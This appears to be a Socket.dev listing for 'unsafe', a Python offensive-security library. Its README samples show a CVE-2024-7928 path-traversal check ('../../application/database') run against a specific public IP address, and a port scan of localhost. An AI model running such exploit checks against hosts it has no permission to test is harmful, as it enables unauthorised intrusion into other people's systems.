
Product
A New Overview in our Dashboard
We redesigned Socket's first logged-in page to display rich and insightful visualizations about your repositories protected against supply chain threats.
A practical and optimal library for those interested in Pentest, cryptography,Vulnerability Scanner and ..
Aiming to become the best package available for hacking and security in Python.
pip install unsafe
Exploit Sample
from unsafe import exploits
penetration_tester = exploits.CVE_2024_7928(
url="http://47.105.229.158:9001",
path="/index/ajax/lang",
key="lang",
value="../../application/database",
)
result = penetration_tester.check_vuln()
if result is not None:
print("Target is vulnerable !")
print("\n".join([f"{k} : {v}" for k, v in result.items()]))
else:
print("Target is not vulnerable !")
Mac Address lookup/Port scanner
from unsafe import network
# macaddress lookup
mac_address = "00:00:5e:00:53:af"
lookup = network.mac_address_lookup(mac=mac_address)
print(lookup)
# port scanning
ports = [80, 443, 21, 27017, 9002]
ip = "127.0.0.1"
open_ports = network.port_scanner(host=ip, ports=ports)
print(open_ports)
FAQs
A practical and optimal library for those interested in Pentest, cryptography,Vulnerability Scanner and ..
We found that unsafe demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 1 open source maintainer collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Product
We redesigned Socket's first logged-in page to display rich and insightful visualizations about your repositories protected against supply chain threats.
Product
Automatically fix and test dependency updates with socket fix—a new CLI tool that turns CVE alerts into safe, automated upgrades.
Security News
CISA denies CVE funding issues amid backlash over a new CVE foundation formed by board members, raising concerns about transparency and program governance.